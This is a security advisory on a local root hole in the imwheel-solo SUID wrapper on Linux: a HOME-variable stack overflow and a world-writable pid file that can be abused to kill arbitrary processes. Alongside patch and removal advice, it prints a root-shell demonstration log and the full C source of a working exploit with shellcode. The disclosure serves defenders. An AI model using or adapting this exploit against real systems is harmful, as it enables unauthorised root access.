COMMAND
imwheel
SYSTEMS AFFECTED
Any system which has imwheel-solo wrapper-script installed as set-UID root
PROBLEM
Following is based on TESO Security Advisory. A vulnerability
within the imwheel application for Linux has been discovered.
Some of these packages are shipped with an suid-root
wrapper-script that invokes the insecure program 'imwheel' with
UID 0.
Among the vulnerable distributions (if the package is installed)
is Halloween Linux Version 4 (imwheel package from the
powertools/contrib. CD).
Tests:
[stealth@liane stealth]$ id
uid=500(stealth) gid=500(stealth) groups=500(stealth)
[stealth@liane stealth]$ cd imhack/
[stealth@liane imhack]$ stat `which imwheel-solo`
File: "/usr/X11R6/bin/imwheel-solo"
Size: 795 Filetype: Regular File
Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 3,1 Inode: 214472 Links: 1
Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
Modify: Mon Nov 1 23:41:15 1999(00132.17:55:45)
Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
[stealth@liane imhack]$ cc imexp.c
[stealth@liane imhack]$ ./a.out
Creating boom-shell...
Creating shellcode...
You can also add an offset to the commandline.
Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
Respect other users privacy!
Invoking vulnerable program (imwheel-solo)...
imwheel is not running as a daemon.
imwheel is not checking/writing a pid file, BE CAREFUL!
An imwheel may be running already, two or more imwheel processes
on the same X display, or using gpm -W, will not operate as expected!
imwheel started (pid=1385)
Knocking on heavens door...
sh-2.03# id
uid=0(root) gid=500(stealth) groups=500(stealth)
sh-2.03#
An attacker may gain local root-access to a system where
vulnerable imwheel package is installed. Even if it should not
be possible for him to get a root-shell (f.e. due to a non-exec
stack-patch) he can use the suid-root perlscript to kill arbitrary
processes.
The suid-root perlscript 'imwheel-solo' invokes the 'imwheel'
program with EUID 0. Due to inaccurate bounds-checking an
internal stack-located buffer can be overflowed by an attacker.
The 'imwheel' program doesn't bounds-check the string it gets
from the HOME environment variable. Further the wrapper-script
which runs privileged can be fooled into sending a SIGTERM signal
to arbitrary processes, causing them to die. This problem appears
because imwheel-solo blindly trusts any PID given by a
world-writable pid-file.
The bug-discovery and the demonstration programs are due to S.
Krahmer. The shell-code is due to Stealth. Exploit can be found
at:
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
http://teso.scene.at or https://teso.scene.at/
Janusz Niewiadomski posted his vesrsion of exploit...
/*
* imwheel local root exploit [ RHSA-2000:016-02 ]
* funkysh 04/2000 funkysh@kris.top.pl
*/
#include <stdlib.h>
#include <stdio.h>
#define BUFFER 2070
#define NOP 0x90
#define PATH "/usr/X11R6/bin/imwheel-solo"
char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[])
{
int i, offset = 0;
char buf[BUFFER];
long address;
if(argc > 1) offset = atoi(argv[1]);
address = getesp() + 1000 + offset;
memset(buf,NOP,BUFFER);
memcpy(buf+(BUFFER-300),code,strlen(code));
for(i=(BUFFER-250);i<BUFFER;i+=4)
*(int *)&buf[i]=address;
setenv("DISPLAY", "DUPA", 1);
setenv("HOME", buf, 1);
execl(PATH, PATH, 0);
}
SOLUTION
The Slackware package available from Linuxmafia.org is not
effected by this, as it does not package with the SUID wrapper.
(The binary included is also not set SUID.) This is with version
0.9.6 of imwheel. A SUID wrapper should simply not be necessary
in the first place.
The standard package of imwheel 0.9.7 does not have a wrapper.
However, during 'installation,' it will prompt you asking whether
or not to install SUID. An excerpt from the Makefile:
## Setting UID, this is best for non-root usage!
## This does not effect usage for root users. (duh!)
## This gives all users kill privileges for other imwheel processes.
Judging from that, if you setup imwheel to be started via the
users' xinit scripts, and killed upon logout, it would have the
same function. To reiterate, SUID is just a quick cop-out for a
better setup. If it is a one-user desktop machine, even less than
that would have to be done.
For RedHat via 'rpm -Fvh [filename]' apply following:
Red Hat Powertools 6.1:
intel: ftp://updates.redhat.com/powertools/6.1/i386/imwheel-0.9.8-1.i386.rpm
alpha: ftp://updates.redhat.com/powertools/6.1/alpha/imwheel-0.9.8-1.alpha.rpm
sparc: ftp://updates.redhat.com/powertools/6.1/sparc/imwheel-0.9.8-1.sparc.rpm
sources: ftp://updates.redhat.com/powertools/6.1/SRPMS/imwheel-0.9.8-1.src.rpm
Red Hat Powertools 6.2:
intel: ftp://updates.redhat.com/powertools/6.2/i386/imwheel-0.9.8-1.i386.rpm
alpha: ftp://updates.redhat.com/powertools/6.2/alpha/imwheel-0.9.8-1.alpha.rpm
sparc: ftp://updates.redhat.com/powertools/6.2/sparc/imwheel-0.9.8-1.sparc.rpm
sources: ftp://updates.redhat.com/powertools/6.2/SRPMS/imwheel-0.9.8-1.src.rpm
Updated RedHat Advisory says that because the core functionality
of imwheel has been incorporated into many existing applications,
removing imwheel will not incur a significant loss of
functionality. If the machine which has imwheel installed is not
a single user machine they recommend removing imwheel. To remove
imwheel run this command:
rpm -e imwheel